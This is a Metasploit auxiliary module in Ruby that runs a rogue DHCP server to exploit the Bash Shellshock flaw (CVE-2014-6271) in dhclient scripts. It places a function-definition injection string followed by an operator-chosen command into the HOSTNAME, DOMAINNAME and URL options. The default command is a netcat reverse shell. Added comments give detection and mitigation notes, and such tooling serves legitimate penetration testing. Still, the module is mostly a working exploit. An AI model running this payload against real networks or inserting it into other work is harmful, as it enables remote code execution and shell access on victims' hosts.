|
require 'msf/core'
require 'rex/proto/dhcp'
# Auxiliary module that runs a DHCP service whose HOSTNAME, DOMAINNAME and URL
# option values all carry the same string: a Bash function-definition prefix
# followed by a PATH assignment and the configured command. The references
# registered below are CVE-2014-6271 and CWE-94 (code injection).
#
# Defensive notes for readers analysing this module:
# - Per the module description, the affected path is the dhclient network
#   configuration scripts, which hand DHCP option values to Bash. Hosts with a
#   fully patched Bash do not execute text that trails a function definition
#   imported from the environment.
# - A DHCP option value beginning with "() {" is not a plausible host name,
#   domain name or URL, so it is a high-signal indicator in packet captures
#   and DHCP client logs.
# - Controls that limit which ports may answer DHCP requests (for example
#   DHCP snooping) reduce exposure to unauthorised DHCP servers in general.
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::DHCPServer

  # Registers the module metadata and the user-settable options.
  def initialize
    metadata = {
      'Name'           => 'DHCP Client Bash Environment Variable Code Injection',
      # The description text stays flush-left on purpose: any leading
      # whitespace inside %q{} would become part of the string.
      'Description'    => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting dhclient network configuration
scripts through the HOSTNAME , DOMAINNAME , and URL DHCP options.
},
      'Author'         => [
        'scriptjunkie', 'apconole[at]yahoo.com',
        'Stephane Chazelas',
        'Ramon de C Valle'
      ],
      'License'        => MSF_LICENSE,
      'Actions'        => [['Service']],
      'PassiveActions' => ['Service'],
      'DefaultAction'  => 'Service',
      'References'     => [
        ['CVE', '2014-6271'],
        ['CWE', '94']
      ],
      'DisclosureDate' => 'Sep 24 2014'
    }
    super(metadata)

    # Each entry is [option name, [required?, description, optional default]].
    option_specs = [
      ['SRVHOST',     [true,  'The IP of the DHCP server']],
      ['NETMASK',     [true,  'The netmask of the local subnet']],
      ['DHCPIPSTART', [false, 'The first IP to give out']],
      ['DHCPIPEND',   [false, 'The last IP to give out']],
      ['ROUTER',      [false, 'The router IP address']],
      ['BROADCAST',   [false, 'The broadcast address to send to']],
      ['DNSSERVER',   [false, 'The DNS server IP address']],
      ['HOSTSTART',   [false, 'The optional host integer counter']],
      ['FILENAME',    [false, 'The optional filename of a tftp boot server']],
      ['CMD',         [true,  'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444']]
    ]
    declared = option_specs.map { |opt_name, attrs| OptString.new(opt_name, attrs) }
    register_options(declared, self.class)
  end

  # Starts the DHCP service with the crafted option values and keeps it up
  # until the operator interrupts the module.
  #
  # start_service, stop_service and dhcp are not defined in this file;
  # presumably they come from the DHCPServer mixin included above.
  def run
    # Function-definition prefix, explicit PATH, then the CMD option. The
    # string is built once, before the service loop.
    injected = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"

    loop do
      begin
        # Hash#merge gives precedence to the argument, so a datastore entry
        # named HOSTNAME, DOMAINNAME or URL replaces the value set here.
        dhcp_options = {
          'HOSTNAME'   => injected,
          'DOMAINNAME' => injected,
          'URL'        => injected
        }.merge(datastore)
        start_service(dhcp_options)

        # select with no descriptors acts as a 2-second wait between
        # liveness checks of the service thread.
        select(nil, nil, nil, 2) while dhcp.thread.alive?
      rescue Interrupt
        break
      ensure
        # Runs on every pass: after an interrupt, and also when the service
        # thread has ended and the loop is about to start it again.
        stop_service
      end
    end
  end
end
|